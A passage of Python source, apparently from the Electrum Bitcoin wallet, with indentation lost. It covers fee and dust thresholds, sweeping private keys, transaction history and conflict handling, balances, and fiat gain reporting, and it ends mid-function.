TX_HEIGHT_LOCAL = -2
TX_HEIGHT_UNCONF_PARENT = -1
TX_HEIGHT_UNCONFIRMED = 0
def relayfee(network):
from .simple_config import FEERATE_DEFAULT_RELAY
MAX_RELAY_FEE = 50000
f = network.relay_fee if network and network.relay_fee else FEERATE_DEFAULT_RELAY
return min(f, MAX_RELAY_FEE)
def dust_threshold(network):
# Change <= dust threshold is added to the tx fee
return 182 * 3 * relayfee(network) / 1000
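# Worked example: assuming the default relay fee of 1000 sat/kB from
# simple_config, dust_threshold = 182 * 3 * 1000 / 1000 = 546 satoshis, so any
# change output worth 546 sat or less is dropped and folded into the fee.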
def append_utxos_to_inputs(inputs, network, pubkey, txin_type, imax):
if txin_type != 'p2pk':
address = bitcoin.pubkey_to_address(txin_type, pubkey)
scripthash = bitcoin.address_to_scripthash(address)
else:
script = bitcoin.public_key_to_p2pk_script(pubkey)
scripthash = bitcoin.script_to_scripthash(script)
address = '(pubkey)'
u = network.listunspent_for_scripthash(scripthash)
for item in u:
if len(inputs) >= imax:
break
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = int(item['tx_pos'])
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def sweep_preparations(privkeys, network, imax=100):
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = ecc.ECPrivkey(privkey).get_public_key_hex(compressed=compressed)
append_utxos_to_inputs(inputs, network, pubkey, txin_type, imax)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
if not inputs:
raise Exception(_('No inputs found. (Note that inputs need to be confirmed)'))
# FIXME actually inputs need not be confirmed now, see https://github.com/kyuupichan/electrumx/issues/365
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < dust_threshold(network):
raise Exception(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d\nDust Threshold: %d'%(total, fee, dust_threshold(network)))
outputs = [(TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime)
tx.BIP_LI01_sort()
tx.set_rbf(True)
tx.sign(keypairs)
return tx
class AddTransactionException(Exception):
pass
class UnrelatedTransactionException(AddTransactionException):
def __str__(self):
return _("Transaction is unrelated to this wallet.")
class CannotBumpFee(Exception): pass
class Abstract_Wallet(PrintError):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = ELECTRUM_VERSION
self.storage = storage
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.gap_limit_for_change = 6 # constant
# locks: if you need to take multiple ones, acquire them in the order they are defined here!
self.lock = threading.RLock()
self.transaction_lock = threading.RLock()
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
self.frozen_addresses = set(storage.get('frozen_addresses',[]))
self.history = storage.get('addr_history',{}) # address -> list(txid, height)
self.fiat_value = storage.get('fiat_value', {})
self.receive_requests = storage.get('payment_requests', {})
# Verified transactions. txid -> (height, timestamp, block_pos). Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# Transactions pending verification. txid -> tx_height. Access with self.lock.
self.unverified_tx = defaultdict(int)
self.load_keystore()
self.load_addresses()
self.test_addresses_sanity()
self.load_transactions()
self.load_local_history()
self.check_history()
self.load_unverified_transactions()
self.remove_local_transactions_we_dont_have()
# There is a difference between wallet.up_to_date and network.is_up_to_date().
# network.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
# Neither of them considers the verifier.
self.up_to_date = False
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
self.coin_price_cache = {}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
@profiler
def load_transactions(self):
# load txi, txo, tx_fees
self.txi = self.storage.get('txi', {})
for txid, d in list(self.txi.items()):
for addr, lst in d.items():
self.txi[txid][addr] = set([tuple(x) for x in lst])
self.txo = self.storage.get('txo', {})
self.tx_fees = self.storage.get('tx_fees', {})
tx_list = self.storage.get('transactions', {})
# load transactions
self.transactions = {}
for tx_hash, raw in tx_list.items():
tx = Transaction(raw)
self.transactions[tx_hash] = tx
if self.txi.get(tx_hash) is None and self.txo.get(tx_hash) is None:
self.print_error("removing unreferenced tx", tx_hash)
self.transactions.pop(tx_hash)
# load spent_outpoints
_spent_outpoints = self.storage.get('spent_outpoints', {})
self.spent_outpoints = defaultdict(dict)
for prevout_hash, d in _spent_outpoints.items():
for prevout_n_str, spending_txid in d.items():
prevout_n = int(prevout_n_str)
self.spent_outpoints[prevout_hash][prevout_n] = spending_txid
@profiler
def load_local_history(self):
self._history_local = {} # address -> set(txid)
for txid in itertools.chain(self.txi, self.txo):
self._add_tx_to_local_history(txid)
def remove_local_transactions_we_dont_have(self):
txid_set = set(self.txi) | set(self.txo)
for txid in txid_set:
tx_height = self.get_tx_height(txid)[0]
if tx_height == TX_HEIGHT_LOCAL and txid not in self.transactions:
self.remove_transaction(txid)
@profiler
def save_transactions(self, write=False):
with self.transaction_lock:
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx)
self.storage.put('txi', self.txi)
self.storage.put('txo', self.txo)
self.storage.put('tx_fees', self.tx_fees)
self.storage.put('addr_history', self.history)
self.storage.put('spent_outpoints', self.spent_outpoints)
if write:
self.storage.write()
def save_verified_tx(self, write=False):
with self.lock:
self.storage.put('verified_tx3', self.verified_tx)
if write:
self.storage.write()
def clear_history(self):
with self.lock:
with self.transaction_lock:
self.txi = {}
self.txo = {}
self.tx_fees = {}
self.spent_outpoints = defaultdict(dict)
self.history = {}
self.verified_tx = {}
self.transactions = {}
self.save_transactions()
@profiler
def check_history(self):
save = False
hist_addrs_mine = list(filter(lambda k: self.is_mine(k), self.history.keys()))
hist_addrs_not_mine = list(filter(lambda k: not self.is_mine(k), self.history.keys()))
for addr in hist_addrs_not_mine:
self.history.pop(addr)
save = True
for addr in hist_addrs_mine:
hist = self.history[addr]
for tx_hash, tx_height in hist:
if self.txi.get(tx_hash) or self.txo.get(tx_hash):
continue
tx = self.transactions.get(tx_hash)
if tx is not None:
self.add_transaction(tx_hash, tx, allow_unrelated=True)
save = True
if save:
self.save_transactions()
def basename(self):
return os.path.basename(self.storage.path)
def save_addresses(self):
self.storage.put('addresses', {'receiving':self.receiving_addresses, 'change':self.change_addresses})
def load_addresses(self):
d = self.storage.get('addresses', {})
if type(d) != dict: d={}
self.receiving_addresses = d.get('receiving', [])
self.change_addresses = d.get('change', [])
def test_addresses_sanity(self):
addrs = self.get_receiving_addresses()
if len(addrs) > 0:
if not bitcoin.is_address(addrs[0]):
raise WalletFileException('The addresses in this wallet are not bitcoin addresses.')
def synchronize(self):
pass
def is_deterministic(self):
return self.keystore.is_deterministic()
def set_up_to_date(self, up_to_date):
with self.lock:
self.up_to_date = up_to_date
if up_to_date:
self.save_transactions(write=True)
# if the verifier is also up to date, persist that too;
# otherwise it will persist its results when it finishes
if self.verifier and self.verifier.is_up_to_date():
self.save_verified_tx(write=True)
def is_up_to_date(self):
with self.lock: return self.up_to_date
def set_label(self, name, text = None):
changed = False
old_text = self.labels.get(name)
if text:
text = text.replace("\n", " ")
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
run_hook('set_label', self, name, text)
self.storage.put('labels', self.labels)
return changed
def set_fiat_value(self, txid, ccy, text):
if txid not in self.transactions:
return
if not text:
d = self.fiat_value.get(ccy, {})
if d and txid in d:
d.pop(txid)
else:
return
else:
try:
Decimal(text)
except:
return
if ccy not in self.fiat_value:
self.fiat_value[ccy] = {}
self.fiat_value[ccy][txid] = text
self.storage.put('fiat_value', self.fiat_value)
def get_fiat_value(self, txid, ccy):
fiat_value = self.fiat_value.get(ccy, {}).get(txid)
try:
return Decimal(fiat_value)
except:
return
def is_mine(self, address):
return address in self.get_addresses()
def is_change(self, address):
if not self.is_mine(address):
return False
return self.get_address_index(address)[0]
def get_address_index(self, address):
raise NotImplementedError()
def get_redeem_script(self, address):
return None
def export_private_key(self, address, password):
if self.is_watching_only():
return []
index = self.get_address_index(address)
pk, compressed = self.keystore.get_private_key(index, password)
txin_type = self.get_txin_type(address)
redeem_script = self.get_redeem_script(address)
serialized_privkey = bitcoin.serialize_privkey(pk, compressed, txin_type)
return serialized_privkey, redeem_script
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_unverified_tx(self, tx_hash, tx_height):
if tx_height in (TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_UNCONF_PARENT) \
and tx_hash in self.verified_tx:
with self.lock:
self.verified_tx.pop(tx_hash)
if self.verifier:
self.verifier.remove_spv_proof_for_tx(tx_hash)
# tx will be verified only if height > 0
if tx_hash not in self.verified_tx:
with self.lock:
self.unverified_tx[tx_hash] = tx_height
def add_verified_tx(self, tx_hash, info):
# Remove from the unverified map and add to the verified map
with self.lock:
self.unverified_tx.pop(tx_hash, None)
self.verified_tx[tx_hash] = info # (tx_height, timestamp, pos)
height, conf, timestamp = self.get_tx_height(tx_hash)
self.network.trigger_callback('verified', tx_hash, height, conf, timestamp)
def get_unverified_txs(self):
'''Returns a map from tx hash to transaction height'''
with self.lock:
return dict(self.unverified_tx) # copy
def undo_verifications(self, blockchain, height):
'''Used by the verifier when a reorg has happened'''
txs = set()
with self.lock:
for tx_hash, item in list(self.verified_tx.items()):
tx_height, timestamp, pos = item
if tx_height >= height:
header = blockchain.read_header(tx_height)
# fixme: use block hash, not timestamp
if not header or header.get('timestamp') != timestamp:
self.verified_tx.pop(tx_hash, None)
txs.add(tx_hash)
return txs
def get_local_height(self):
""" return last known height if we are offline """
return self.network.get_local_height() if self.network else self.storage.get('stored_height', 0)
def get_tx_height(self, tx_hash):
""" Given a transaction, returns (height, conf, timestamp) """
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
conf = max(self.get_local_height() - height + 1, 0)
return height, conf, timestamp
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return height, 0, None
else:
# local transaction
return TX_HEIGHT_LOCAL, 0, None
def get_txpos(self, tx_hash):
"return position, even if the tx is unverified"
with self.lock:
if tx_hash in self.verified_tx:
height, timestamp, pos = self.verified_tx[tx_hash]
return height, pos
elif tx_hash in self.unverified_tx:
height = self.unverified_tx[tx_hash]
return (height, 0) if height > 0 else ((1e9 - height), 0)
else:
return (1e9+1, 0)
def is_found(self):
return self.history.values() != [[]] * len(self.history)
def get_num_tx(self, address):
""" return number of transactions where address is involved """
return len(self.history.get(address, []))
def get_tx_delta(self, tx_hash, address):
"effect of tx on address"
delta = 0
        # subtract the value of coins sent from the address
d = self.txi.get(tx_hash, {}).get(address, [])
for n, v in d:
delta -= v
# add the value of the coins received at address
d = self.txo.get(tx_hash, {}).get(address, [])
for n, v, cb in d:
delta += v
return delta
def get_tx_value(self, txid):
" effect of tx on the entire domain"
delta = 0
for addr, d in self.txi.get(txid, {}).items():
for n, v in d:
delta -= v
for addr, d in self.txo.get(txid, {}).items():
for n, v, cb in d:
delta += v
return delta
def get_wallet_delta(self, tx):
""" effect of tx on wallet """
is_relevant = False # "related to wallet?"
is_mine = False
is_pruned = False
is_partial = False
v_in = v_out = v_out_mine = 0
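        # v_in: sum of our inputs (when known), v_out: all outputs, v_out_mine: outputs paying to our addresses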
for txin in tx.inputs():
addr = self.get_txin_address(txin)
if self.is_mine(addr):
is_mine = True
is_relevant = True
d = self.txo.get(txin['prevout_hash'], {}).get(addr, [])
for n, v, cb in d:
if n == txin['prevout_n']:
value = v
break
else:
value = None
if value is None:
is_pruned = True
else:
v_in += value
else:
is_partial = True
if not is_mine:
is_partial = False
for addr, value in tx.get_outputs():
v_out += value
if self.is_mine(addr):
v_out_mine += value
is_relevant = True
if is_pruned:
# some inputs are mine:
fee = None
if is_mine:
v = v_out_mine - v_out
else:
# no input is mine
v = v_out_mine
else:
v = v_out_mine - v_in
if is_partial:
# some inputs are mine, but not all
fee = None
else:
# all inputs are mine
fee = v_in - v_out
if not is_mine:
fee = None
return is_relevant, is_mine, v, fee
def get_tx_info(self, tx):
is_relevant, is_mine, v, fee = self.get_wallet_delta(tx)
exp_n = None
can_broadcast = False
can_bump = False
label = ''
height = conf = timestamp = None
tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions.keys():
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = _("{} confirmations").format(conf)
else:
status = _('Not verified')
elif height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED):
status = _('Unconfirmed')
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_mempool():
size = tx.estimated_size()
fee_per_byte = fee / size
exp_n = self.network.config.fee_to_depth(fee_per_byte)
can_bump = is_mine and not tx.is_final()
else:
status = _('Local')
can_broadcast = self.network is not None
else:
status = _("Signed")
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
status = _("Unsigned") if s == 0 else _('Partially signed') + ' (%d/%d)'%(s,r)
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
return tx_hash, status, label, can_broadcast, can_bump, amount, fee, height, conf, timestamp, exp_n
def get_addr_io(self, address):
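        # received: {"txid:n": (height, value, is_coinbase)}; sent: {"txid:n": height of the spending tx}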
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_addr_utxo(self, address):
coins, spent = self.get_addr_io(address)
for txi in spent:
coins.pop(txi)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
# return the balance of a bitcoin address: confirmed and matured, unconfirmed, unmatured
def get_addr_balance(self, address):
received, sent = self.get_addr_io(address)
c = u = x = 0
local_height = self.get_local_height()
for txo, (tx_height, v, is_cb) in received.items():
if is_cb and tx_height + COINBASE_MATURITY > local_height:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
return c, u, x
def get_spendable_coins(self, domain, config):
confirmed_only = config.get('confirmed_only', False)
return self.get_utxos(domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False):
coins = []
if domain is None:
domain = self.get_addresses()
domain = set(domain)
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr)
for x in utxos.values():
if confirmed_only and x['height'] <= 0:
continue
if mature and x['coinbase'] and x['height'] + COINBASE_MATURITY > self.get_local_height():
continue
coins.append(x)
continue
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
out = []
out += self.get_receiving_addresses()
out += self.get_change_addresses()
return out
def get_frozen_balance(self):
return self.get_balance(self.frozen_addresses)
def get_balance(self, domain=None):
if domain is None:
domain = self.get_addresses()
domain = set(domain)
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, addr):
h = []
# we need self.transaction_lock but get_tx_height will take self.lock
# so we need to take that too here, to enforce order of locks
with self.lock, self.transaction_lock:
related_txns = self._history_local.get(addr, set())
for tx_hash in related_txns:
tx_height = self.get_tx_height(tx_hash)[0]
h.append((tx_hash, tx_height))
return h
def _add_tx_to_local_history(self, txid):
with self.transaction_lock:
for addr in itertools.chain(self.txi.get(txid, []), self.txo.get(txid, [])):
cur_hist = self._history_local.get(addr, set())
cur_hist.add(txid)
self._history_local[addr] = cur_hist
def _remove_tx_from_local_history(self, txid):
with self.transaction_lock:
for addr in itertools.chain(self.txi.get(txid, []), self.txo.get(txid, [])):
cur_hist = self._history_local.get(addr, set())
try:
cur_hist.remove(txid)
except KeyError:
pass
else:
self._history_local[addr] = cur_hist
def get_txin_address(self, txi):
addr = txi.get('address')
if addr and addr != "(pubkey)":
return addr
prevout_hash = txi.get('prevout_hash')
prevout_n = txi.get('prevout_n')
dd = self.txo.get(prevout_hash, {})
for addr, l in dd.items():
for n, v, is_cb in l:
if n == prevout_n:
return addr
return None
def get_txout_address(self, txo):
_type, x, v = txo
if _type == TYPE_ADDRESS:
addr = x
elif _type == TYPE_PUBKEY:
addr = bitcoin.public_key_to_p2pkh(bfh(x))
else:
addr = None
return addr
def get_conflicting_transactions(self, tx):
"""Returns a set of transaction hashes from the wallet history that are
directly conflicting with tx, i.e. they have common outpoints being
spent with tx. If the tx is already in wallet history, that will not be
reported as a conflict.
"""
conflicting_txns = set()
with self.transaction_lock:
for txin in tx.inputs():
if txin['type'] == 'coinbase':
continue
prevout_hash = txin['prevout_hash']
prevout_n = txin['prevout_n']
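                # spent_outpoints maps prevout_hash -> {prevout_n: spending_txid}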
spending_tx_hash = self.spent_outpoints[prevout_hash].get(prevout_n)
if spending_tx_hash is None:
continue
# this outpoint has already been spent, by spending_tx
assert spending_tx_hash in self.transactions
conflicting_txns |= {spending_tx_hash}
txid = tx.txid()
if txid in conflicting_txns:
# this tx is already in history, so it conflicts with itself
if len(conflicting_txns) > 1:
raise Exception('Found conflicting transactions already in wallet history.')
conflicting_txns -= {txid}
return conflicting_txns
def add_transaction(self, tx_hash, tx, allow_unrelated=False):
assert tx_hash, tx_hash
assert tx, tx
assert tx.is_complete()
# we need self.transaction_lock but get_tx_height will take self.lock
# so we need to take that too here, to enforce order of locks
with self.lock, self.transaction_lock:
# NOTE: returning if tx in self.transactions might seem like a good idea
# BUT we track is_mine inputs in a txn, and during subsequent calls
            # of add_transaction tx, we might learn that more and more of its inputs
            # are is_mine, as we roll the gap_limit forward
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
tx_height = self.get_tx_height(tx_hash)[0]
if not allow_unrelated:
# note that during sync, if the transactions are not properly sorted,
# it could happen that we think tx is unrelated but actually one of the inputs is is_mine.
# this is the main motivation for allow_unrelated
is_mine = any([self.is_mine(self.get_txin_address(txin)) for txin in tx.inputs()])
is_for_me = any([self.is_mine(self.get_txout_address(txo)) for txo in tx.outputs()])
if not is_mine and not is_for_me:
raise UnrelatedTransactionException()
# Find all conflicting transactions.
# In case of a conflict,
# 1. confirmed > mempool > local
# 2. this new txn has priority over existing ones
# When this method exits, there must NOT be any conflict, so
# either keep this txn and remove all conflicting (along with dependencies)
# or drop this txn
conflicting_txns = self.get_conflicting_transactions(tx)
if conflicting_txns:
existing_mempool_txn = any(
self.get_tx_height(tx_hash2)[0] in (TX_HEIGHT_UNCONFIRMED, TX_HEIGHT_UNCONF_PARENT)
for tx_hash2 in conflicting_txns)
existing_confirmed_txn = any(
self.get_tx_height(tx_hash2)[0] > 0
for tx_hash2 in conflicting_txns)
if existing_confirmed_txn and tx_height <= 0:
# this is a non-confirmed tx that conflicts with confirmed txns; drop.
return False
if existing_mempool_txn and tx_height == TX_HEIGHT_LOCAL:
# this is a local tx that conflicts with non-local txns; drop.
return False
# keep this txn and remove all conflicting
to_remove = set()
to_remove |= conflicting_txns
for conflicting_tx_hash in conflicting_txns:
to_remove |= self.get_depending_transactions(conflicting_tx_hash)
for tx_hash2 in to_remove:
self.remove_transaction(tx_hash2)
# add inputs
def add_value_from_prev_output():
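                # note: this closure uses prevout_hash, prevout_n, ser and d from the
                # enclosing scope (they are set in the input loop below)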
dd = self.txo.get(prevout_hash, {})
# note: this nested loop takes linear time in num is_mine outputs of prev_tx
for addr, outputs in dd.items():
# note: instead of [(n, v, is_cb), ...]; we could store: {n -> (v, is_cb)}
for n, v, is_cb in outputs:
if n == prevout_n:
if addr and self.is_mine(addr):
if d.get(addr) is None:
d[addr] = set()
d[addr].add((ser, v))
return
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = prevout_hash + ':%d' % prevout_n
self.spent_outpoints[prevout_hash][prevout_n] = tx_hash
add_value_from_prev_output()
# add outputs
self.txo[tx_hash] = d = {}
for n, txo in enumerate(tx.outputs()):
v = txo[2]
ser = tx_hash + ':%d'%n
addr = self.get_txout_address(txo)
if addr and self.is_mine(addr):
if d.get(addr) is None:
d[addr] = []
d[addr].append((n, v, is_coinbase))
# give v to txi that spends me
next_tx = self.spent_outpoints[tx_hash].get(n)
if next_tx is not None:
dd = self.txi.get(next_tx, {})
if dd.get(addr) is None:
dd[addr] = set()
if (ser, v) not in dd[addr]:
dd[addr].add((ser, v))
self._add_tx_to_local_history(next_tx)
# add to local history
self._add_tx_to_local_history(tx_hash)
# save
self.transactions[tx_hash] = tx
return True
def remove_transaction(self, tx_hash):
def remove_from_spent_outpoints():
# undo spends in spent_outpoints
if tx is not None: # if we have the tx, this branch is faster
for txin in tx.inputs():
if txin['type'] == 'coinbase':
continue
prevout_hash = txin['prevout_hash']
prevout_n = txin['prevout_n']
self.spent_outpoints[prevout_hash].pop(prevout_n, None)
if not self.spent_outpoints[prevout_hash]:
self.spent_outpoints.pop(prevout_hash)
else: # expensive but always works
for prevout_hash, d in list(self.spent_outpoints.items()):
for prevout_n, spending_txid in d.items():
if spending_txid == tx_hash:
self.spent_outpoints[prevout_hash].pop(prevout_n, None)
if not self.spent_outpoints[prevout_hash]:
self.spent_outpoints.pop(prevout_hash)
            # Remove this tx itself, if nothing spends from it.
# It is not so clear what to do if other txns spend from it, but it will be
# removed when those other txns are removed.
if not self.spent_outpoints[tx_hash]:
self.spent_outpoints.pop(tx_hash)
with self.transaction_lock:
self.print_error("removing tx from history", tx_hash)
tx = self.transactions.pop(tx_hash, None)
remove_from_spent_outpoints()
self._remove_tx_from_local_history(tx_hash)
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_unverified_tx(tx_hash, tx_height)
self.add_transaction(tx_hash, tx, allow_unrelated=True)
def receive_history_callback(self, addr, hist, tx_fees):
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
# make tx local
self.unverified_tx.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
if self.verifier:
self.verifier.remove_spv_proof_for_tx(tx_hash)
self.history[addr] = hist
for tx_hash, tx_height in hist:
# add it in case it was previously unconfirmed
self.add_unverified_tx(tx_hash, tx_height)
# if addr is new, we have to recompute txi and txo
tx = self.transactions.get(tx_hash)
if tx is None:
continue
self.add_transaction(tx_hash, tx, allow_unrelated=True)
# Store fees
self.tx_fees.update(tx_fees)
def get_history(self, domain=None):
# get domain
if domain is None:
domain = self.get_addresses()
domain = set(domain)
# 1. Get the history of each address in the domain, maintain the
# delta of a tx as the sum of its deltas on domain addresses
tx_deltas = defaultdict(int)
for addr in domain:
h = self.get_address_history(addr)
for tx_hash, height in h:
delta = self.get_tx_delta(tx_hash, addr)
if delta is None or tx_deltas[tx_hash] is None:
tx_deltas[tx_hash] = None
else:
tx_deltas[tx_hash] += delta
# 2. create sorted history
history = []
for tx_hash in tx_deltas:
delta = tx_deltas[tx_hash]
height, conf, timestamp = self.get_tx_height(tx_hash)
history.append((tx_hash, height, conf, timestamp, delta))
history.sort(key = lambda x: self.get_txpos(x[0]))
history.reverse()
# 3. add balance
c, u, x = self.get_balance(domain)
balance = c + u + x
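        # history is newest-first here; each entry is tagged with the balance after that tx,
        # then its delta is subtracted to get the balance before it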
h2 = []
for tx_hash, height, conf, timestamp, delta in history:
h2.append((tx_hash, height, conf, timestamp, delta, balance))
if balance is None or delta is None:
balance = None
else:
balance -= delta
h2.reverse()
# fixme: this may happen if history is incomplete
if balance not in [None, 0]:
self.print_error("Error: history not synchronized")
return []
return h2
def balance_at_timestamp(self, domain, target_timestamp):
h = self.get_history(domain)
for tx_hash, height, conf, timestamp, value, balance in h:
if timestamp > target_timestamp:
return balance - value
# return last balance
return balance
@profiler
def get_full_history(self, domain=None, from_timestamp=None, to_timestamp=None, fx=None, show_addresses=False):
from .util import timestamp_to_datetime, Satoshis, Fiat
out = []
income = 0
expenditures = 0
capital_gains = Decimal(0)
fiat_income = Decimal(0)
fiat_expenditures = Decimal(0)
h = self.get_history(domain)
for tx_hash, height, conf, timestamp, value, balance in h:
if from_timestamp and (timestamp or time.time()) < from_timestamp:
continue
if to_timestamp and (timestamp or time.time()) >= to_timestamp:
continue
item = {
'txid':tx_hash,
'height':height,
'confirmations':conf,
'timestamp':timestamp,
'value': Satoshis(value),
'balance': Satoshis(balance)
}
item['date'] = timestamp_to_datetime(timestamp)
item['label'] = self.get_label(tx_hash)
if show_addresses:
tx = self.transactions.get(tx_hash)
item['inputs'] = list(map(lambda x: dict((k, x[k]) for k in ('prevout_hash', 'prevout_n')), tx.inputs()))
item['outputs'] = list(map(lambda x:{'address':x[0], 'value':Satoshis(x[1])}, tx.get_outputs()))
# value may be None if wallet is not fully synchronized
if value is None:
continue
# fixme: use in and out values
if value < 0:
expenditures += -value
else:
income += value
# fiat computations
if fx and fx.is_enabled():
date = timestamp_to_datetime(timestamp)
fiat_value = self.get_fiat_value(tx_hash, fx.ccy)
fiat_default = fiat_value is None
fiat_value = fiat_value if fiat_value is not None else value / Decimal(COIN) * self.price_at_timestamp(tx_hash, fx.timestamp_rate)
item['fiat_value'] = Fiat(fiat_value, fx.ccy)
item['fiat_default'] = fiat_default
if value < 0:
acquisition_price = - value / Decimal(COIN) * self.average_price(tx_hash, fx.timestamp_rate, fx.ccy)
liquidation_price = - fiat_value
item['acquisition_price'] = Fiat(acquisition_price, fx.ccy)
cg = liquidation_price - acquisition_price
item['capital_gain'] = Fiat(cg, fx.ccy)
capital_gains += cg
fiat_expenditures += -fiat_value
else:
fiat_income += fiat_value
out.append(item)
# add summary
if out:
b, v = out[0]['balance'].value, out[0]['value'].value
start_balance = None if b is None or v is None else b - v
end_balance = out[-1]['balance'].value
if from_timestamp is not None and to_timestamp is not None:
start_date = timestamp_to_datetime(from_timestamp)
end_date = timestamp_to_datetime(to_timestamp)
else:
start_date = None
end_date = None
summary = {
'start_date': start_date,
'end_date': end_date,
'start_balance': Satoshis(start_balance),
'end_balance': Satoshis(end_balance),
'income': Satoshis(income),
'expenditures': Satoshis(expenditures)
}
if fx and fx.is_enabled():
unrealized = self.unrealized_gains(domain, fx.timestamp_rate, fx.ccy)
summary['capital_gains'] = Fiat(capital_gains, fx.ccy)
summary['fiat_income'] = Fiat(fiat_income, fx.ccy)
summary['fiat_expenditures'] = Fiat(fiat_expenditures, fx.ccy)
summary['unrealized_gains'] = Fiat(unrealized, fx.ccy)
summary['start_fiat_balance'] = Fiat(fx.historical_value(start_balance, start_date), fx.ccy)
summary['end_fiat_balance'] = Fiat(fx.historical_value(end_balance, end_date), fx.ccy)
summary['start_fiat_value'] = Fiat(fx.historical_value(COIN, start_date), fx.ccy)
summary['end_fiat_value'] = Fiat(fx.historical_value(COIN, end_date), fx.ccy)
else:
summary = {}
return {
'transactions': out,
'summary': summary
}
def get_label(self, tx_hash):
label = self.labels.get(tx_hash, '')
        if label == '':
label = self.get_default_label(tx_hash)
return label
def get_default_label(self, tx_hash):
if self.txi.get(tx_hash) == {}:
d = self.txo.get(tx_hash, {})
labels = []
for addr in d.keys():
label = self.labels.get(addr)
if label:
labels.append(label)
return ', '.join(labels)
return ''
def get_tx_status(self, tx_hash, height, conf, timestamp):
from .util import format_time
extra = []
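        # small status values index into TX_STATUS; confirmed txs get 3 + min(conf, 6)
        # and are displayed with their timestamp instead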
if conf == 0:
tx = self.transactions.get(tx_hash)
if not tx:
return 2, 'unknown'
is_final = tx and tx.is_final()
if not is_final:
extra.append('rbf')
fee = self.get_wallet_delta(tx)[3]
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee is not None:
size = tx.estimated_size()
fee_per_byte = fee / size
extra.append(format_fee_satoshis(fee_per_byte) + ' sat/b')
if fee is not None and height in (TX_HEIGHT_UNCONF_PARENT, TX_HEIGHT_UNCONFIRMED) \
